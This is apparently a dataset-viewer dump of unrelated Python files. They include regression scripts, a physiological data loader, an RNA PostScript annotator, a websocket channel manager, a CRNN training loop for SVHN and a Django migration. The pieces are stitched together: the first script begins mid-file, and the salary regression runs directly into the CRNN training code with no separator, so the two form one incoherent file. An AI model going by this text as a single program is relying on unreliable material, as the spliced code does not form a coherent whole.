composition = PredictFrame(args.input_csv, descriptors_list=["CC",])
Biopyth = PredictFrame(args.input_csv, descriptors_list=["BioPythDescriptor",])
AminoAcid = PredictFrame(args.input_csv, descriptors_list=["AAC"])

## Materialise the descriptor dataframes.
comp = composition.show()
Bio = Biopyth.show()
aa = AminoAcid.show()

## Columns to drop from the BioPython frame: the 20 standard amino-acid
## letters (B, J, O, U, X, Z are not standard amino acids).
columns = [alpha for alpha in string.ascii_uppercase
           if alpha not in ("B", "J", "O", "U", "X", "Z")]
df = Bio.drop(columns, axis=1)

## Concatenate all descriptor frames column-wise into the model input.
dataf = pd.concat([df, comp, aa], axis=1, join="outer")

## Load the trained model.
with open("model.pkl", "rb") as predictive_model:
    model = joblib.load(predictive_model)

## Predict all rows in a single vectorised call instead of one
## reshape + predict per row (the original looped over range(len(df)), which
## would also silently skip any extra rows introduced by the outer join).
y_predictions = model.predict(dataf.to_numpy())

## Save predictions to file.
df_predictions = pd.DataFrame({'prediction': y_predictions})
df_predictions.to_csv(output_file_path, index=False)
|
import pandas as pd
import numpy as np
import sklearn
from sklearn import linear_model
# FIX: `import sklearn` alone does not expose sklearn.model_selection; the
# submodule must be imported explicitly for train_test_split to be reachable.
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt  # from matplotlib import style / import seaborn as sns

# Load the track data set and report its size.
data = pd.read_csv("data.csv")
print(len(data))

# Keep only the audio features plus the prediction target.
data = data[
    ["danceability", "energy", "acousticness", "duration_ms", "popularity", "tempo", "instrumentalness",
     "liveness", "year", "loudness", "speechiness"]]
predict = "popularity"

# Features are every column except the target. FIX: drop(columns=...) replaces
# the positional-axis form drop([predict], 1), which was removed in pandas 2.0.
x = np.array(data.drop(columns=[predict]))
y = np.array(data[predict])
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)

linear = linear_model.LinearRegression()
linear.fit(x_train, y_train)
acc = linear.score(x_test, y_test)  # R^2 on the held-out split
print(acc)
print(linear.coef_)

#Lplt.show(sns.jointplot(x="speechiness", y="popularity", data=data, kind='reg', joint_kws={'line_kws':{'color':'red'}}))
#print("Coefficient: \n", linear.coef_)
#print("Intercept \n", linear.intercept_)

predictions = linear.predict(x_test)
# FIX: use a distinct loop index so the feature matrix `x` is not shadowed.
for i in range(len(predictions)):
    print(predictions[i], x_test[i], y_test[i])
#print(linear.score(x, y))
|
"""
datafiles.py
============
This module provides functions to load data from csv and csv-like files into
memory for easy manipulation. It makes no assumptions about downstream
processing. (e.g. whether the data is intended to be used with scikit-learn).
"""
from collections import defaultdict
import cPickle as pickle
import re
import sys
import utilities
from utilities import safe_float, safe_int
# Constants
DATA_FOLDER = '../../../Desktop/data'
EPISODES_FILE = 'physiological-full-sparse.csv'
OUTCOMES_FILE = 'outcomes.csv'
EPISODES_PICKLE = EPISODES_FILE.replace('csv', 'pkl')
NUM_VARS = 13
# Internal functions
def _parse_episodes_file(f):
    # Parse the sparse episodes CSV. The first line holds the column headers;
    # each subsequent line is "<episode_id>" followed by (time, variable,
    # value) triples separated by a mix of commas and colons, hence the
    # combined split pattern.
    # NOTE: Python 2 code — map() returns a list here, so len(data) works;
    # this would fail on Python 3 where map() returns an iterator.
    headers = f.readline().strip().split(',')
    episodes = []
    for line in f:
        split = re.split(',|:', line)
        id, data = int(split[0]), map(safe_float, split[1:])
        episode = defaultdict(list)
        # Measurements come in (time, variable, value) triples.
        for i in range(0, len(data), 3):
            time, var, value = map(float, data[i:i + 3])
            var = int(var) - 1 # convert for 0-indexing
            # Group measurements per physiological variable.
            episode[var].append((time, value))
        episodes.append((id, episode))
    return headers, episodes
# Public functions
@utilities.timed
@utilities.cached
@utilities.pickled('/'.join((DATA_FOLDER, EPISODES_PICKLE)))
def load_episodes():
    """ Loads all episode data.
    Each of the 7890 episodes contains 13 physiological variables that are
    sampled very sparsely in time.
    Returns a list of (episode_id, episode_data) tuples.
    - episode_id is a an integer.
    - episode_data is a list of thirteen lists. Each of the thirteen lists
    contains measurements for a physiological variable. The measurements are
    a (time, value) tuple. Time and value are floats.
    """
    # Parsing is delegated to the internal helper; the pickled decorator
    # caches the result on disk so the CSV is only parsed once.
    with open('/'.join((DATA_FOLDER, EPISODES_FILE))) as f:
        headers, episodes = _parse_episodes_file(f)
    # Python 2 print statement.
    print '{0} episodes loaded.'.format(len(episodes))
    return headers, episodes
@utilities.timed
@utilities.cached
def load_outcomes():
    """ Loads the outcomes associated with each episode.
    The columns are:
    - episode_id
    - length of stay (in seconds?)
    - mortality 0 for died, 1 for lived
    - medical length of stay (some missing values)
    """
    with open('/'.join((DATA_FOLDER, OUTCOMES_FILE))) as f:
        headers = f.readline().strip().split(',')
        outcomes = []
        for row in f:
            fields = row.split(',')
            episode_id = safe_int(fields[0])
            outcomes.append((episode_id, [safe_int(v) for v in fields[1:]]))
    return headers, outcomes
# Script entry point: warm the outcomes cache when run directly.
if __name__ == '__main__':
    load_outcomes()
|
#! /usr/bin/env python
import argparse, sys, os, errno
import logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] [%(levelname)s] %(name)s: %(message)s')
def annotate_structure_diagram(args):
    """Colour the nucleotides of an RNA structure diagram (PostScript).

    Reads the PostScript file ``args.input_file``, finds every nucleotide
    label line of the form ``(A) <x> <y> lwstring``, and writes
    ``args.output_file`` with a filled circle drawn behind each nucleotide.
    Circle colours come either from ``args.colors`` (one "r g b" line per
    nucleotide) or from ``args.values`` (one scalar per nucleotide, mapped
    through the matplotlib colormap ``args.colormap`` after min-max
    normalisation and widening about 0.5 by ``args.scale``).

    Raises:
        ValueError: if the number of colours/values does not match the number
            of nucleotides found in the diagram.
    """
    import re
    # FIX: `logger` was referenced below but never defined anywhere in this
    # script (NameError at first call); bind a named logger locally.
    logger = logging.getLogger('annotate_structure_diagram')
    pat_nucleotide = re.compile(r'^\([AUGCT]\) ([0-9\.\-]+) ([0-9\.\-]+) lwstring$')
    prolog_lines = []
    nucleotide_lines = []
    epilog_lines = []
    end_prolog = False
    nucleotide_coords = []
    # read input PostScript file
    logger.info('read input file: ' + args.input_file)
    with open(args.input_file, 'r') as fin:
        for line in fin:
            m = pat_nucleotide.match(line.strip())
            if m is not None:
                x, y = [float(a) for a in m.groups()]
                # offset by (3, 3) so the circle is centred on the glyph
                nucleotide_coords.append((x + 3, y + 3))
                end_prolog = True
                nucleotide_lines.append(line)
            else:
                # everything before the first nucleotide line is prolog,
                # everything after the last one is epilog
                if end_prolog:
                    epilog_lines.append(line)
                else:
                    prolog_lines.append(line)
    colors = []
    if args.colors is not None:
        import numpy as np
        logger.info('read colors from file: ' + args.colors)
        with open(args.colors, 'r') as f:
            for line in f:
                colors.append([float(a) for a in line.strip().split()])
        colors = np.asarray(colors)
    elif args.values is not None:
        import numpy as np
        import matplotlib
        matplotlib.use('Agg')
        from matplotlib.pyplot import get_cmap
        logger.info('use matplotlib colormap: ' + args.colormap)
        colormap = get_cmap(args.colormap)
        values = []
        logger.info('read values from file: ' + args.values)
        with open(args.values, 'r') as f:
            for line in f:
                values.append(float(line.strip()))
        values = np.asarray(values)
        # min-max normalise, then widen/narrow the range about 0.5
        values = (values - np.min(values))/(np.max(values) - np.min(values))
        values = (values - 0.5)*args.scale + 0.5
        colors = colormap(values)[:, :3]
    if len(colors) != len(nucleotide_coords):
        raise ValueError('number of values ({0}) and number nucleotides ({1}) does not match'.format(len(colors), len(nucleotide_coords)))
    logger.info('create output file: ' + args.output_file)
    with open(args.output_file, 'w') as fout:
        fout.writelines(prolog_lines)
        # define the lwfcarc procedure: draw a filled, coloured arc
        fout.write('/lwfcarc {newpath gsave setrgbcolor translate scale /rad exch def /ang1 exch def /ang2 exch def\n')
        fout.write('0.0 0.0 rad ang1 ang2 arc fill grestore} def\n')
        # one filled circle per nucleotide, emitted before the glyphs so the
        # letters are drawn on top
        for nucleotide_coord, color in zip(nucleotide_coords, colors):
            x, y = nucleotide_coord
            r, g, b = color
            fout.write('360.00 0.00 4.20 1.00 1.00 {:.2f} {:.2f} {:.3f} {:.3f} {:.3f} lwfcarc\n'.format(x, y, r, g, b))
        fout.writelines(nucleotide_lines)
        fout.writelines(epilog_lines)
if __name__ == '__main__':
    # Command-line interface for the annotator above.
    parser = argparse.ArgumentParser(description='Process SHAPE-MaP data')
    parser.add_argument('--input-file', '-i', type=str, required=True,
                        help='input structure diagram in PostScript format '
                             '(downloaded from http://www.rna.icmb.utexas.edu/DAT/3C/Structure/index.php)')
    # Exactly one color source must be given: explicit RGB triples, or
    # scalar values mapped through a colormap.
    g = parser.add_mutually_exclusive_group(required=True)
    g.add_argument('--colors', type=str,
                   help='a text file containing RGB values for each nucleotide per line')
    g.add_argument('--values', type=str,
                   help='a text file containing continous values for each nucleotide per line')
    parser.add_argument('--colormap', type=str, default='Greys_r',
                        help='matplotlib colormap name')
    # Contrast stretch applied to the normalized values around 0.5.
    parser.add_argument('--scale', type=float, default=1.0)
    parser.add_argument('--output-file', '-o', type=str, required=True,
                        help='output file in PostScript format')
    args = parser.parse_args()
    logger = logging.getLogger('annotate_structure_diagram')
    annotate_structure_diagram(args)
|
"""WS channels."""
import asyncio
import hashlib
import json
import logging
import sys
from time import monotonic
from typing import Callable, Dict, List
import aiohttp
if sys.version_info >= (3, 7):
from contextlib import asynccontextmanager
else:
# For python3.6
from ambra_sdk.async_context_manager import asynccontextmanager
logger = logging.getLogger(__name__)
# Server inactivity timeout = 300
# https://github.com/dicomgrid/v3services/blob/master/app/websocket.pl#L40
INACTIVITY_TIMEOUT = 10
class AsyncWSManager:  # NOQA: WPS214
    """Async websocket (WS) channels manager.

    The manager creates a socket connection on demand and pings it every
    INACTIVITY_TIMEOUT seconds to keep it alive. When the server closes
    the connection anyway, the manager recreates it and resubscribes all
    known channels.

    Communication with the WS goes through subscribe/unsubscribe requests
    and the ``wait_for*`` helpers.
    """

    def __init__(
        self,
        url: str,
    ):
        """Init.

        :param url: websocket url
        """
        self._url = url
        # channel name -> sid; used to resubscribe after a reconnect
        self._channels: Dict[str, str] = {}
        self._session = None
        self._ws = None
        self._last_ping = None
        self._ping_interval = INACTIVITY_TIMEOUT
        self._subscribe_wait_timeout = 10
        self._unsubscribe_wait_timeout = self._subscribe_wait_timeout

    @asynccontextmanager  # NOQA:WPS217,WPS213
    async def channels(
        self,
        sid: str,
        channel_names: List[str],
    ):
        """Channels ws context manager.

        Subscribes to every channel on entry and unsubscribes (then closes
        the socket and the session) on exit.

        :param sid: sid
        :param channel_names: list of channels
        :yields: self manager with channels subscriptions
        """
        for channel in channel_names:
            await self.subscribe(sid, channel)
            await self.wait_for_subscribe(
                channel,
                timeout=self._subscribe_wait_timeout,
            )
        try:  # NOQA: WPS501
            yield self
        finally:
            logger.debug('Stop')
            for channel_name in channel_names:
                await self.unsubscribe(channel_name)
                await self.wait_for_unsubscribe(
                    channel_name,
                    timeout=self._unsubscribe_wait_timeout,
                )
            # refresh socket and close it
            await self._get_ws()
            assert self._ws is not None  # NOQA:S101
            await self._ws.close()
            await self._session.close()

    @asynccontextmanager
    async def channel(
        self,
        sid: str,
        channel_name: str,
    ):
        """Channel ws context manager.

        :param sid: sid
        :param channel_name: name of channel
        :yields: self manager with channel subscription
        """
        async with self.channels(sid, channel_names=[channel_name]) as ws:
            yield ws

    async def subscribe(self, sid, channel):
        """Subscribe to a channel.

        :param sid: sid
        :param channel: channel
        """
        logger.debug('Subscribe %s', channel)
        self._channels[channel] = sid
        sub_request = json.dumps(
            {
                'action': 'subscribe',
                'channel': channel,
                'sid': sid,
            },
        )
        ws = await self._get_ws()
        await ws.send_str(sub_request)

    async def resubscribe(self):
        """Resubscribe all known channels (used after a reconnect)."""
        logger.debug('Resubscribe')
        for channel, sid in self._channels.items():
            # FIX: the original called the nonexistent ``self._subscribe``,
            # which raised AttributeError on every resubscription attempt.
            await self.subscribe(sid, channel)

    async def unsubscribe(self, channel):
        """Unsubscribe from a channel.

        :param channel: channel
        """
        logger.debug('Unsubscribe %s', channel)
        self._channels.pop(channel)
        close_request = json.dumps(
            {
                'action': 'unsubscribe',
                'channel': channel,
                # But required! ;-)
                'sid': 'NOT NEEDED!',
            },
        )
        ws = await self._get_ws()
        await ws.send_str(close_request)

    async def wait_for(  # NOQA:WPS231
        self,
        fn: Callable[[aiohttp.WSMessage], bool],
        timeout: int = None,
    ) -> aiohttp.WSMessage:
        """Wait until ``fn(msg)`` is True and return that message.

        On TimeoutError this func does not stop the ws.
        So you need to run this func in a try-except block.

        :param fn: predicate used to select the message
        :param timeout: overall timeout in seconds (None waits forever)
        :raises TimeoutError: timeout error
        :raises RuntimeError: unknown message type in ws
        :returns: message
        """
        start = monotonic()
        while True:
            await self._ping()
            if timeout and (monotonic() - start) >= timeout:
                raise TimeoutError
            ws = await self._get_ws()
            # FIX: the original passed ``min(self._ping_interval, timeout)``
            # directly, which raises TypeError when ``timeout`` is None.
            if timeout is None:
                receive_timeout = self._ping_interval
            else:
                receive_timeout = min(self._ping_interval, timeout)
            try:
                msg: aiohttp.WSMessage = await asyncio.wait_for(
                    ws.receive(),
                    timeout=receive_timeout,
                )
            except asyncio.TimeoutError:
                # No message yet: loop again so a ping is sent when due.
                continue
            logger.debug('Recieved: %s', str(msg))
            if msg.type == aiohttp.WSMsgType.TEXT:
                if fn(msg):
                    return msg
            elif msg.type == aiohttp.WSMsgType.CLOSING:
                continue
            elif msg.type == aiohttp.WSMsgType.CLOSED:
                logger.debug('Connection closed')
                # refresh socket (this also triggers resubscription)
                ws = await self._get_ws()
                continue
            else:
                raise RuntimeError(
                    'Unimplemented {msg_type}'.format(
                        msg_type=str(msg.type),
                    ),
                )

    async def wait_for_event(
        self,
        channel: str,
        sid: str,
        event: str,
        timeout: int = None,
    ) -> aiohttp.WSMessage:
        """Wait for an event on a channel.

        :param channel: channel name
        :param sid: sid
        :param event: event status name
        :param timeout: timeout
        :return: msg
        """
        sid_md5 = hashlib.md5(sid.encode()).hexdigest()  # NOQA:S303

        def _is_ready(msg):  # NOQA:WPS430
            # Match TEXT messages carrying this channel/sid/event triple.
            if msg.type != aiohttp.WSMsgType.TEXT:
                return False
            msg_json = msg.json()
            msg_event = msg_json.get('event')
            msg_channel = msg_json.get('channel')
            msg_sid_md5 = msg_json.get('sid_md5')
            if msg_event is None \
                    or msg_channel is None \
                    or msg_sid_md5 is None:
                return False
            if channel == msg_channel \
                    and msg_sid_md5 == sid_md5 \
                    and msg_event == event:
                return True
            return False

        return await self.wait_for(_is_ready, timeout)

    async def wait_for_subscribe(
        self,
        channel: str,
        timeout: int = None,
    ) -> aiohttp.WSMessage:
        """Wait for a subscribe confirmation.

        :param channel: channel name
        :param timeout: timeout
        :return: msg
        """
        def _is_subscribed(msg):  # NOQA:WPS430
            if msg.type != aiohttp.WSMsgType.TEXT:
                return False
            msg_json = msg.json()
            status = msg_json.get('status')
            msg_channel = msg_json.get('channel')
            if status is not None \
                    and msg_channel is not None \
                    and channel == msg_channel \
                    and status == 'OK':
                return True
            return False

        return await self.wait_for(_is_subscribed, timeout)

    async def wait_for_unsubscribe(
        self,
        channel: str,
        timeout: int = None,
    ) -> aiohttp.WSMessage:
        """Wait for an unsubscribe confirmation.

        :param channel: channel name
        :param timeout: timeout
        :return: msg
        """
        # The server sends identical confirmations for subscribe and
        # unsubscribe, so reuse the subscribe matcher.
        return await self.wait_for_subscribe(channel, timeout)

    async def _get_ws(self):
        """Websocket connection.

        Lazily creates the session/socket and refreshes the connection
        when it was closed, resubscribing all known channels.

        :return: websocket connection
        """
        if self._session is None or self._session.closed:
            logger.debug('Create new session')
            self._session = aiohttp.ClientSession()
        if self._ws is None:
            logger.debug('Run ws connection')
            self._ws = await self._session.ws_connect(self._url)
        elif self._ws.closed:
            logger.debug('Restart ws connection')
            self._ws = await self._session.ws_connect(self._url)
            # FIX: the original called the nonexistent ``self._resubscribe``,
            # raising AttributeError on every reconnect.
            await self.resubscribe()
        return self._ws

    async def _ping(self):
        """Send a ping frame when the inactivity interval has elapsed."""
        now = monotonic()
        if self._last_ping is None:
            self._last_ping = now
        if now - self._last_ping >= self._ping_interval:
            logger.debug('Ping')
            ping_request = json.dumps({'action': 'ping'})
            ws = await self._get_ws()
            await ws.send_str(ping_request)
            self._last_ping = now
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Simple linear regression of salary on years of experience.

Created on Tue Feb  6 23:09:27 2018

@author: gjxhlan
"""
# Libraries for data handling, modeling and plotting.
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression


def _plot_fit(x_points, y_points, x_line, y_line, title):
    """Scatter the observations, overlay the fitted line, label the axes."""
    plt.scatter(x_points, y_points, c='red')
    plt.plot(x_line, y_line, color='blue')
    plt.title(title)
    plt.xlabel('Years of Experience')
    plt.ylabel('Salary')
    plt.show()


# Load the dataset: all-but-last column is the feature, column 1 the target.
frame = pd.read_csv('Salary_Data.csv')
years = frame.iloc[:, :-1].values
wages = frame.iloc[:, 1].values

# Hold out a third of the data for testing (fixed seed for reproducibility).
years_train, years_test, wages_train, wages_test = train_test_split(
    years, wages, test_size=1 / 3, random_state=0)

# Fit a simple linear regression on the training split.
model = LinearRegression()
model.fit(years_train, wages_train)

# Predictions on the held-out test set.
wages_pred = model.predict(years_test)

# Visualize train and test splits against the same fitted line.
fitted_line = model.predict(years_train)
_plot_fit(years_train, wages_train, years_train, fitted_line,
          'Salary vs Experience (Training set)')
_plot_fit(years_test, wages_test, years_train, fitted_line,
          'Salary vs Experience (Test set)')
import tensorflow as tf
import numpy as np
import os, time
from crnn_SVNH import CRNN
from dataset import Dataset
from common import config
def train(prev_model_path=None):
    """Train the CRNN on SVHN with CTC loss; optionally resume a checkpoint.

    Builds the TF1 graph (CRNN forward pass, CTC loss, SGD optimizer and a
    beam-search decoder for evaluation), then runs the epoch loop with
    periodic evaluation, TensorBoard summaries and checkpointing.

    :param prev_model_path: checkpoint path to restore before training, or
        None to start from freshly initialized weights.
    """
    # Prepare the datasets (project-local Dataset class).
    dataset_train = Dataset('train')
    dataset_test = Dataset('test')
    # Define the computing graph: CRNN forward pass + CTC loss.
    model = CRNN()
    net_out, raw_pred = model.build_infer_graph()
    loss = model.compute_loss(net_out)
    # Set optimizer; depending on UPDATE_OPS keeps batch-norm statistics
    # updated on every training step.
    global_step = tf.Variable(0, name='global_step', trainable=False)
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
        #optimizer = tf.train.AdamOptimizer()
        optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0005)
        train_op = optimizer.minimize(
            loss=loss, global_step=global_step)
    # Beam-search CTC decoder used for evaluation; all sequences share the
    # fixed length config.seq_length.
    decoded, _ = tf.nn.ctc_beam_search_decoder(net_out,
        sequence_length=tf.to_int32(tf.fill(tf.shape(model._inputdata)[:1], config.seq_length)),
        beam_width=5,
        merge_repeated=False, top_paths=1)
    decoded = decoded[0]
    # Dense decode output; the last class index is used as the blank/padding.
    decoded_paths = tf.sparse_tensor_to_dense(decoded, default_value=config.class_num-1)

    def evaluate(sess, dataset):
        # Run one full pass over ``dataset`` and return (mean loss, accuracy).
        loss_lst = []
        label_pred = []
        label_true = []
        for inputdata, sparse_label, raw_label in dataset.one_epoch_generator():
            decoded_paths_val, loss_val = sess.run([decoded_paths, loss], feed_dict={
                model.place_holders['inputdata']: inputdata,
                model.place_holders['label']: sparse_label,
                model.place_holders['is_training']: False
            })
            for x in decoded_paths_val:
                # Strip the padding class before comparing sequences.
                label_pred.append([idx for idx in x if idx != config.class_num-1])
            for x in raw_label:
                label_true.append(x)
            loss_lst.append(loss_val)
        acc = cal_acc(label_pred, label_true)
        return np.mean(loss_lst), acc

    # TensorBoard summaries.
    tboard_save_dir = config.tboard_save_dir
    os.makedirs(tboard_save_dir, exist_ok=True)
    tf.summary.scalar(name='train_loss', tensor=loss)
    merged = tf.summary.merge_all()
    # Checkpoint saver configuration.
    saver = tf.train.Saver()
    model_save_dir = config.model_save_dir
    os.makedirs(model_save_dir, exist_ok=True)
    # Session configuration.
    sess = tf.Session()
    summary_writer = tf.summary.FileWriter(tboard_save_dir)
    summary_writer.add_graph(sess.graph)
    # Training loop.
    global_cnt = 0
    with sess.as_default():
        if prev_model_path is None:
            sess.run(tf.global_variables_initializer())
            print('Initialiation finished!')
            epoch = 0
        else:
            # NOTE(review): the epoch counter restarts at 0 even when
            # resuming from a checkpoint — confirm this is intended.
            print('Restore model from {:s}'.format(prev_model_path))
            saver.restore(sess=sess, save_path=prev_model_path)
            epoch = 0
        while epoch < config.epochs:
            epoch += 1
            for batch_idx, (inputdata, sparse_label, raw_label) in enumerate(dataset_train.one_epoch_generator()):
                global_cnt += 1
                loss_val, _, summary = sess.run([loss, train_op, merged], feed_dict={
                    model.place_holders['inputdata']: inputdata,
                    model.place_holders['label']: sparse_label,
                    model.place_holders['is_training']: True
                })
                summary_writer.add_summary(summary, global_cnt)
                # Periodic mid-epoch evaluation on the test set.
                if (batch_idx+1)%config.evaluate_batch_interval == 0:
                    test_loss_val, test_acc = evaluate(sess, dataset_test)
                    print("----Epoch-{:n}, progress:{:.2%}, evaluation results:".format(epoch,
                        (batch_idx+1)*config.train_batch_size/config.train_size))
                    print("--Train_loss: {:.4f}".format(loss_val))
                    print("--Test_loss: {:.4f}".format(test_loss_val))
                    print("--Test_accuarcy: {:.4f}\n".format(test_acc))
                    # Manually built summaries for the test metrics.
                    summary_writer.add_summary(
                        tf.Summary(value=[tf.Summary.Value(tag='test_loss', simple_value=test_loss_val)]),
                        global_cnt)
                    summary_writer.add_summary(
                        tf.Summary(value=[tf.Summary.Value(tag='test_acc', simple_value=test_acc)]),
                        global_cnt)
            # End-of-epoch evaluation and checkpointing.
            if epoch % config.save_epoch_interval == 0:
                test_loss_val, test_acc = evaluate(sess, dataset_test)
                train_loss_val, train_acc = evaluate(sess, dataset_train)
                print("----Epoch-{:n} finished, evaluation results:".format(epoch))
                print("--Train_loss: {:.4f}".format(train_loss_val))
                print("--Train_accuarcy: {:.4f}".format(train_acc))
                print("--Test_loss: {:.4f}".format(test_loss_val))
                print("--Test_accuarcy: {:.4f}\n".format(test_acc))
                model_name = 'CRNN-e{:n}-acc{:.1f}.ckpt'.format(epoch, 100*test_acc)
                model_save_path = os.path.join(model_save_dir, model_name)
                print('Saving model...')
                saver.save(sess=sess, save_path=model_save_path, global_step=epoch)
                print('Saved!')
def cal_acc(label_pred, label_true):
    """Return the exact-match accuracy between predicted and true labels.

    A sample counts as correct only when the whole predicted label sequence
    equals the corresponding ground-truth sequence.

    :param label_pred: list of predicted label sequences
    :param label_true: list of ground-truth label sequences, same length
    :raises ValueError: if the two lists differ in length (the original
        used ``assert``, which is stripped under ``python -O``)
    :returns: fraction of exact matches in [0.0, 1.0]; 0.0 for empty input
    """
    if len(label_pred) != len(label_true):
        raise ValueError(
            'label_pred and label_true must have the same length '
            '({0} != {1})'.format(len(label_pred), len(label_true)))
    if not label_pred:
        # Avoid ZeroDivisionError on an empty evaluation set.
        return 0.0
    matched = sum(1 for pred, true in zip(label_pred, label_true) if pred == true)
    return matched / len(label_pred)
if __name__ == '__main__':
    # Resume training from a previous checkpoint; use train() to start fresh.
    train('.\\tf_ckpt\\CRNN-e7-acc59.7.ckpt-7')
    #train()
|
# File-level imports kept as in the original (numpy/math were used by a
# removed experiment; see NOTE below).
import numpy as np
import matplotlib.pyplot as plt
import math

# Plot the track points recorded in track_points_3.txt as a scatter plot.
# Each line of the file holds an "x y" pair; x is negated and the axes are
# swapped when plotting so the figure matches the track's orientation in
# Gazebo.
#
# NOTE(review): a dead, fully commented-out experiment that generated two
# parallel rails offset by a buffer on either side of the track (and its
# unused x_rail_*/y_rail_*/count/buf variables) was removed; recover it
# from version control if needed.

x = []
y = []
# FIX: use a context manager so the file handle is closed even on error
# (the original opened the file and never closed it).
with open("track_points_3.txt", "r") as track_file:
    for line in track_file:
        fields = line.split()
        x.append(-1 * float(fields[0]))  # negate to show figure as gazebo
        y.append(float(fields[1]))

plt.scatter(y, x)  # swap axes to show figure as gazebo
plt.show()
# Generated by Django 3.1.4 on 2021-01-08 00:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Initial migration for the campus app: creates the Campus and Location
    # models. FIX: the verbose_name strings were mojibake (UTF-8 Chinese
    # mis-decoded as cp874), which also split the 'full_name' string literal
    # across two lines and made the file a SyntaxError; the original Chinese
    # labels are restored below.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Campus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=4, verbose_name='简称')),
                ('full_name', models.CharField(max_length=16, verbose_name='全称')),
                ('longitude', models.FloatField(verbose_name='经度')),
                ('latitude', models.FloatField(verbose_name='纬度')),
                ('zoom', models.PositiveSmallIntegerField(verbose_name='缩放级别')),
            ],
            options={
                'verbose_name': '校区',
                'verbose_name_plural': '校区',
            },
        ),
        migrations.CreateModel(
            name='Location',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=16, verbose_name='名称')),
                ('longitude', models.FloatField(verbose_name='经度')),
                ('latitude', models.FloatField(verbose_name='纬度')),
                ('campus', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='locations', related_query_name='location', to='campus.campus', verbose_name='校区')),
            ],
            options={
                'verbose_name': '位置',
                'verbose_name_plural': '位置',
            },
        ),
    ]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.